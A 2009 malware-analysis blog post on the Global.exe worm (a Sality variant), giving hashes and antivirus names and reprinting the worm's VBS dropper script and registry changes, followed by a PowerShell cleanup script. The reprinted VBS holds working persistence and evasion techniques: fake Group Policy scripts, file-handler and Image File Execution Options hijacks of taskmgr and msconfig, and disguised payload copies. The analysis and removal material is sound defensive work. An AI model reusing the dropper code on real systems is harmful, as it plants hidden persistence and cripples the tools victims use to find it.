Monday, 05 January 2009

Removing the Global.exe Virus

My analysis results from examining this virus

Malware name: Global.Worm [Morphost], virus.Win32.Sality.z [KasperskyLab], W32.Silly.FDC [Symantec], W32/Sality.ag [McAfee]

Size: 286,720 bytes

Sample source: detected by Morphost's heuristic method

Icon: folder icon (together with the NeverShowExt tweaks listed below, the dropped .exe files pass as folders)

CRC32: 55BC6B01 (based on the file found)

MD5: 67CE8B53CBF5A1D3BF4269748F82ACCA (based on the file found)

Built with: Visual Basic


The project directory when this virus was compiled was:

C:\Documents and Settings\TASDA.TASDA-B20F43BAE\Desktop07\Project1.vbp


The following VBS script was found inside it (reproduced as found; the comments are mine and mark what each block does):

dim fs,rg
set fs = createobject("scripting.filesystemobject")
set rg = createobject("wscript.shell")
on error resume next

' Screensaver and the .msc / .reg file handlers are redirected to dropped copies of the worm
rg.regwrite "HKCR\.vbs\", "VBSFile"
rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", " C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.regwrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:\WINDOWS\system\KEYBOARD.exe"
rg.regwrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\", "C:\WINDOWS\Fonts\Fonts.exe"

' Boom.vbs is registered as a fake "Local Group Policy" logoff script for the current user
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID","LocalGPO"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID","Local"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script","C:\WINDOWS\Cursors\Boom.vbs"

' ... and as a machine-wide shutdown script
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script", "C:\WINDOWS\Cursors\Boom.vbs"

' ... and as a machine-wide startup script
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script", "C:\WINDOWS\Cursors\Boom.vbs"

' The master copy microsoft.hlp is cloned to every path referenced above, under system-looking names
If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")
If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")
If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")
If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")
If Not fs.fileexists("C:\WINDOWS\system32\dllcache\Default.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")
If Not fs.fileexists("C:\windows\system32\drivers\drivers.cab.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")
If Not fs.fileexists("C:\windows\media\rndll32.pif ") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")
If Not fs.fileexists("C:\windows\fonts\tskmgr.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe")




Creates files at:

C:\windows\system32\dllcache\autorun.inf

C:\windows\Cursors\Boom.vbs

and others



Creates the following registry keys:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile]

NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]

NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]

DisableStatusMessages = 0x00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

sys = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

(Default) = "%Windir%\system\KEYBOARD.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = "%System%\dllcache\Default.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe]

Debugger = "%FontsDir%\fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]

Debugger = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]

Debugger = "%Windir%\Media\rndll32.pif"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]

Debugger = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]

Debugger = "%FontsDir%\tskmgr.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"

[HKEY_CURRENT_USER\Control Panel\Desktop]

SCRNSAVE.EXE = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = "%System%\dllcache\Default.exe"

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"



Removes the original registry value (the stock .msc handler):

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = "%SystemRoot%\system32\mmc.exe "%1" %*"




Modifies the following registry values:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command]

(Default) = "%Windir%\pchealth\Global.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]

ValueName = "ShowSuperHiden"

[HKEY_CURRENT_USER\Control Panel\Desktop]

AutoEndTasks = "1"

ScreenSaveTimeOut = "30"



=============================================================================


This worm can be cleaned with Morphost Antivirus. [NB: Morphost has since been updated, so please download the new version.]

I have added this worm's signature to the Morphost database, so you can now scan your computer for Global.Worm with Morphost.

If Global.Worm still will not leave your computer, do the following:

- Choose the Settings tab

- Choose the option "let users make their database themselves" in the "database" frame

- Then add just one sample of Global.Worm

- And scan right away!
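For anyone without Morphost, the file and registry listing above is enough to audit and clean a machine by hand. The PowerShell script below is an added example written for this page; it is not part of the original post and not Morphost's code. It assumes Windows XP-era paths under %windir%, an elevated prompt and PowerShell 2 or later. The stock mmc.exe handler value is the one the post shows being overwritten; the stock regedit.exe "%1" value for regfile is an assumption. It reports by default and only changes anything when run with -Remove.

```powershell
# Added audit/cleanup example for the Global.Worm persistence listed in this post.
# Not part of the original post or of Morphost. Report-only by default; -Remove
# deletes the dropped files and entries. Run from an elevated prompt. powershell.exe
# is not among the IFEO-hijacked names, so it still starts while taskmgr/msconfig/procexp do not.
param([switch]$Remove)

$KnownMd5 = '67CE8B53CBF5A1D3BF4269748F82ACCA'   # MD5 of the sample, from the post
$Win = $env:windir
$Sys = "$Win\system32"

# Files the VBS drops (all copies of microsoft.hlp), plus its master copy and the helper files
$DroppedFiles = @(
    "$Win\Fonts\Fonts.exe", "$Win\pchealth\helpctr\binaries\HelpHost.com",
    "$Win\pchealth\Global.exe", "$Win\system\KEYBOARD.exe", "$Sys\dllcache\Default.exe",
    "$Sys\drivers\drivers.cab.exe", "$Win\Media\rndll32.pif", "$Win\Fonts\tskmgr.exe",
    "$Win\Cursors\Boom.vbs", "$Sys\dllcache\autorun.inf", "$Win\Help\microsoft.hlp"
)
# Regex matching any dropped file name, used to recognise hijacked registry values
$BadName = ($DroppedFiles | ForEach-Object { [regex]::Escape((Split-Path $_ -Leaf)) }) -join '|'

function Report($What, $Where, $Value) { Write-Host ("[!] {0}: {1} -> {2}" -f $What, $Where, $Value) }

# MD5 through .NET so the script also runs on PowerShell 2, which lacks Get-FileHash
function Get-Md5Hex($Path) {
    $s = [System.IO.File]::OpenRead($Path)
    try { ([System.Security.Cryptography.MD5]::Create().ComputeHash($s) | ForEach-Object { $_.ToString('X2') }) -join '' }
    finally { $s.Close() }
}

# 1. Dropped files. A copy that does not hash to the sample is a different build (or an
#    infected host file: the Kaspersky name puts this in the Sality file-infector family).
foreach ($f in $DroppedFiles) {
    if (-not (Test-Path -LiteralPath $f)) { continue }
    $h = Get-Md5Hex $f
    $tag = if ($h -eq $KnownMd5) { 'MD5 matches sample' } else { "MD5 $h differs from sample" }
    Report 'file' $f $tag
    if ($Remove) { Remove-Item -LiteralPath $f -Force }
}

# 2. IFEO Debugger hijacks: launching any of these tools starts the worm instead
$IfeoBase = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
foreach ($t in 'auto.exe','autorun.exe','autoruns.exe','boot.exe','ctfmon.exe','msconfig.exe','procexp.exe','taskmgr.exe') {
    $k = Join-Path $IfeoBase $t
    $dbg = (Get-ItemProperty -Path $k -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        Report 'IFEO Debugger' $t $dbg
        if ($Remove) { Remove-Item -Path $k -Recurse -Force }
    }
}

# 3. Hijacked file-type handlers, restored to the stock XP commands. The mmc.exe value is the
#    one the post shows being overwritten; the regedit.exe value is assumed.
$Handlers = @{
    'HKLM:\SOFTWARE\Classes\MSCFile\Shell\Open\Command' = '%SystemRoot%\system32\mmc.exe "%1" %*'
    'HKLM:\SOFTWARE\Classes\regfile\shell\open\command' = 'regedit.exe "%1"'
}
foreach ($k in $Handlers.Keys) {
    $cur = (Get-ItemProperty -Path $k -Name '(default)' -ErrorAction SilentlyContinue).'(default)'
    if ($cur -match $BadName) {
        Report 'handler' $k $cur
        if ($Remove) { New-ItemProperty -Path $k -Name '(default)' -Value $Handlers[$k] -PropertyType ExpandString -Force | Out-Null }
    }
}

# 4. Autostart values that point at a dropped file: Run/RunOnce, policy Run, screensaver, GPO scripts
$Autostarts = @(
    @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', '(default)'),
    @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce', '(default)'),
    @('HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce', '(default)'),
    @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run', 'sys'),
    @('HKCU:\Control Panel\Desktop', 'SCRNSAVE.EXE'),
    @('HKLM:\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup', 'Script'),
    @('HKLM:\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown', 'Script'),
    @('HKCU:\Software\Policies\Microsoft\Windows\System\Scripts\Logoff', 'Script')
)
foreach ($pair in $Autostarts) {
    $path, $name = $pair
    $val = (Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue).$name
    if ($val -match $BadName) {
        Report 'autostart' "$path\$name" $val
        if ($Remove) { Remove-ItemProperty -Path $path -Name $name }
    }
}

# 5. NeverShowExt on exefile/comfile hides the real extension, so a folder-icon Fonts.exe passes as a folder
foreach ($cls in 'exefile','comfile') {
    $k = "HKLM:\SOFTWARE\Classes\$cls"
    if ($null -ne (Get-ItemProperty -Path $k -Name NeverShowExt -ErrorAction SilentlyContinue)) {
        Report 'NeverShowExt' $k 'present'
        if ($Remove) { Remove-ItemProperty -Path $k -Name NeverShowExt }
    }
}
```

Run it once without -Remove to see what is present, end the worm's processes (the dropped copies will refuse deletion while they are running; taskmgr.exe and procexp.exe are hijacked via IFEO until step 2 has run, so use tasklist/taskkill or Stop-Process instead), then run it with -Remove. The remaining tweaks in the listing (DisableStatusMessages, AutoEndTasks, ScreenSaveTimeOut, the SuperHidden setting) are cosmetic and can be reverted by hand. Because the Kaspersky name places this sample in the Sality family of file infectors, removing the dropped copies and registry entries is not the whole job: a full antivirus disinfection pass over every executable is still needed.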
